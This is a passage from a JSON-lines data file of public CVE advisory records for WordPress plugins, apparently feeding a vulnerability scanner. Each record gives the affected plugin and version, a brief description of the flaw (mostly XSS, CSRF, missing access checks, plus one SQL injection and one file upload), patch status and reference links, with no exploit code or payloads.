ities\\\/id\\\/051fb185-5004-42f2-9624-6cba11b01e8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/051fb185-5004-42f2-9624-6cba11b01e8d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22282","slug":"ez-form-calculator-premium","versionImpact":"2.14.1.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in EPC ez Form Calculator - WordPress plugin allows Reflected XSS.This issue affects ez Form Calculator - WordPress plugin: from n\/a through 2.14.1.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/ez-form-calculator-premium\\\/vulnerability\\\/wordpress-ez-form-calculator-wordpress-plugin-plugin-2-14-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/ez-form-calculator-premium\\\/vulnerability\\\/wordpress-ez-form-calculator-wordpress-plugin-plugin-2-14-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6062","slug":"yougler-blogger-profile-page","versionImpact":"* - v1.01","description":"The Yougler Blogger Profile Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, v1.01. This is due to missing or incorrect nonce validation on the 'yougler-plugin.php' page. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yougler-blogger-profile-page\\\/trunk\\\/yougler-plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yougler-blogger-profile-page\\\/trunk\\\/yougler-plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7102fb97-96a4-4fd9-824d-6fa6d483f37a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7102fb97-96a4-4fd9-824d-6fa6d483f37a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5800","slug":"testimonial-post-type","versionImpact":"1.2.1","description":"The Testimonial Post type plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018auto_play\u2019 parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonial-post-type\\\/trunk\\\/testimonial-post-type.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonial-post-type\\\/trunk\\\/testimonial-post-type.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/testimonial-post-type\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/testimonial-post-type\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd3fe254-e8cb-450b-901b-fdf49209013f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd3fe254-e8cb-450b-901b-fdf49209013f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0553","slug":"quick-restaurant-menu","versionImpact":"2.0.2","description":"The Quick Restaurant Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its settings parameters in versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/settings\\\/settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/settings\\\/settings.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfd8a6a4-9159-480f-abe2-71972585217b\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfd8a6a4-9159-480f-abe2-71972585217b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36696","slug":"product-input-fields-for-woocommerce","versionImpact":"1.2.6","description":"The Product Input Fields for WooCommerce plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the handle_downloads() function in versions up to, and including, 1.2.6. This makes it possible for unauthenticated attackers to download files from the vulnerable service.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01e41573-9329-48e1-9191-e8e1532f7afc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01e41573-9329-48e1-9191-e8e1532f7afc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2349889%40product-input-fields-for-woocommerce&new=2349889%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2349889%40product-input-fields-for-woocommerce&new=2349889%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15f345e6-fc53-4bac-bc5a-de898181ea74\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15f345e6-fc53-4bac-bc5a-de898181ea74\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4773","slug":"wordpress-social-login","versionImpact":"3.0.4","description":"The WordPress Social Login plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wordpress_social_login_meta' shortcode in versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-social-login\\\/tags\\\/3.0.4\\\/includes\\\/widgets\\\/wsl.auth.widgets.php#L413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-social-login\\\/tags\\\/3.0.4\\\/includes\\\/widgets\\\/wsl.auth.widgets.php#L413\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b987822d-2b1b-4f79-988b-4bd731864b63?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b987822d-2b1b-4f79-988b-4bd731864b63?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5426","slug":"post-meta-data-manager","versionImpact":"1.2.0","description":"The Post Meta Data Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pmdm_wp_delete_user_meta,  pmdm_wp_delete_term_meta, and pmdm_wp_ajax_delete_meta functions in versions up to, and including, 1.2.0. This makes it possible for unauthenticated attackers to delete user, term, and post meta belonging to arbitrary users.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2981559\\\/post-meta-data-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2981559\\\/post-meta-data-manager\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6a7f882-4582-4b08-9597-329d140ad782?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6a7f882-4582-4b08-9597-329d140ad782?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7083","slug":"voting-record","versionImpact":"2.0","description":"The Voting Record WordPress plugin through 2.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba77704a-32a1-494b-b2c0-e1c2a3f98adc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba77704a-32a1-494b-b2c0-e1c2a3f98adc\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-7083.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-7083.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1157","slug":"bold-page-builder","versionImpact":"4.8.0","description":"The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's button URL in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e166a7db-45f7-4a0d-9966-dbec9ade204a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e166a7db-45f7-4a0d-9966-dbec9ade204a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/trunk\\\/content_elements\\\/bt_bb_button\\\/bt_bb_button.php#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/trunk\\\/content_elements\\\/bt_bb_button\\\/bt_bb_button.php#L161\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2239","slug":"premium-addons-pro","versionImpact":"2.9.12","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Premium Magic Scroll module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/254f3a1c-0d5d-499b-9da7-129f21ba70af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/254f3a1c-0d5d-499b-9da7-129f21ba70af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4847","slug":"alttext-ai","versionImpact":"1.4.9","description":"The Alt Text AI \u2013 Automatically generate image alt text for SEO and accessibility plugin for WordPress is vulnerable to generic SQL Injection via the \u2018last_post_id\u2019 parameter in all versions up to, and including, 1.4.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c192623-eb46-4f1d-b897-433ac80608cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c192623-eb46-4f1d-b897-433ac80608cb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alttext-ai\\\/trunk\\\/includes\\\/class-atai-attachment.php#L677\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alttext-ai\\\/trunk\\\/includes\\\/class-atai-attachment.php#L677\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086107\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086107\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alttext-ai\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alttext-ai\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6161","slug":"default-thumbnail-plus","versionImpact":"1.0.2.3","description":"The Default Thumbnail Plus plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'get_cache_image' function in all versions up to, and including, 1.0.2.3. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/046f11b6-7d1a-4bd3-8250-4c5a50fab3ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/046f11b6-7d1a-4bd3-8250-4c5a50fab3ff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/default-thumbnail-plus\\\/trunk\\\/default-thumbnail-plus.php?rev=597280#L337\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/default-thumbnail-plus\\\/trunk\\\/default-thumbnail-plus.php?rev=597280#L337\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10522","slug":"co-marquage-service-public","versionImpact":"0.5.76","description":"The Co-marquage service-public.fr plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.5.76. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/co-marquage-service-public\\\/tags\\\/0.5.76\\\/includes\\\/admin\\\/notices.class.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/co-marquage-service-public\\\/tags\\\/0.5.76\\\/includes\\\/admin\\\/notices.class.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/co-marquage-service-public\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/co-marquage-service-public\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/664f43a6-6461-42ce-a3e4-2277c01a0efb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/664f43a6-6461-42ce-a3e4-2277c01a0efb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11812","slug":"wtyczka-seopilot-dla-wp","versionImpact":"3.3.091","description":"The Wtyczka SeoPilot dla WP plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.091. This is due to missing or incorrect nonce validation on the SeoPilot_Admin_Options() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wtyczka-seopilot-dla-wp\\\/trunk\\\/seopilot.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wtyczka-seopilot-dla-wp\\\/trunk\\\/seopilot.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5efb2fbe-d839-4fb1-80bb-91adf0d39a2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5efb2fbe-d839-4fb1-80bb-91adf0d39a2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7231","slug":"link-party","versionImpact":"1.0","description":"The illi Link Party! WordPress plugin through 1.0 lacks proper access controls, allowing unauthenticated visitors to delete links.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/797692ce-f355-4d4a-af01-4bd9abc60a34\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/797692ce-f355-4d4a-af01-4bd9abc60a34\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6061","slug":"kk-youtube-video","versionImpact":"0.2","description":"The kk Youtube Video plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'kkytv' shortcode in all versions up to, and including, 0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kk-youtube-video\\\/trunk\\\/kk-youtube-video.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kk-youtube-video\\\/trunk\\\/kk-youtube-video.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd581604-e2f6-42c4-81ef-10873683526b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd581604-e2f6-42c4-81ef-10873683526b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5767","slug":"crowdfunding-for-woocommerce","versionImpact":"3.1.14","description":"The Crowdfunding for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 3.1.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crowdfunding-for-woocommerce\\\/trunk\\\/includes\\\/shortcodes\\\/class-wc-crowdfunding-shortcodes-progress-bar.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crowdfunding-for-woocommerce\\\/trunk\\\/includes\\\/shortcodes\\\/class-wc-crowdfunding-shortcodes-progress-bar.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/crowdfunding-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/crowdfunding-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a576f39e-42de-4881-a490-000850ea1d2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a576f39e-42de-4881-a490-000850ea1d2d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0550","slug":"quick-restaurant-menu","versionImpact":"2.0.2","description":"The Quick Restaurant Menu plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. This is due to the fact that during menu item deletion\/modification, the plugin does not verify that the post ID provided to the AJAX action is indeed a menu item. This makes it possible for authenticated attackers, with subscriber-level access or higher, to modify or delete arbitrary posts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/ajax-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/ajax-functions.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/faa4fba5-cd19-4b96-aa09-07ed6d52a107\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/faa4fba5-cd19-4b96-aa09-07ed6d52a107\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4719","slug":"simple-membership","versionImpact":"4.3.5","description":"The Simple Membership plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `list_type` parameter in versions up to, and including, 4.3.5 due to insufficient input sanitization and output escaping. Using this vulnerability, unauthenticated attackers could inject arbitrary web scripts into pages that are being executed if they can successfully trick a user into taking an action, such as clicking a malicious link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-membership\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-membership\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4b10172-7e54-4ff8-9fbb-41d160ce49e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4b10172-7e54-4ff8-9fbb-41d160ce49e4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2962730%40simple-membership&new=2962730%40simple-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2962730%40simple-membership&new=2962730%40simple-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5425","slug":"post-meta-data-manager","versionImpact":"1.2.0","description":"The Post Meta Data Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pmdm_wp_change_user_meta and pmdm_wp_change_post_meta functions in versions up to, and including, 1.2.0. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to gain elevated (e.g., administrator) privileges.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2981559\\\/post-meta-data-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2981559\\\/post-meta-data-manager\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7f4e710-99a2-49df-a513-725e1daaa18a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7f4e710-99a2-49df-a513-725e1daaa18a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0708","slug":"landing-page-cat","versionImpact":"1.7.2","description":"The Landing Page Cat \u2013 Coming Soon Page, Maintenance Page & Squeeze Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.7.2. This makes it possible for unauthenticated attackers to access landing pages that may not be public.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b34f50a-4d2d-49b8-86e4-0416c8be202b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b34f50a-4d2d-49b8-86e4-0416c8be202b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034324\\\/landing-page-cat\\\/trunk\\\/includes\\\/landing\\\/landing.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034324\\\/landing-page-cat\\\/trunk\\\/includes\\\/landing\\\/landing.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2238","slug":"premium-addons-pro","versionImpact":"2.9.12","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Mouse Cursor module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82e5fd9f-9a1f-4a4c-ac06-61bf65e3c8ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82e5fd9f-9a1f-4a4c-ac06-61bf65e3c8ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5541","slug":"ibtana-visual-editor","versionImpact":"1.2.3.3","description":"The Ibtana \u2013 WordPress Website Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ibtana_visual_editor_register_ajax_json_endpont' function in all versions up to, and including, 1.2.3.3. This makes it possible for unauthenticated attackers to update option values for reCAPTCHA keys on the WordPress site. This can be leveraged to bypass reCAPTCHA on the site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 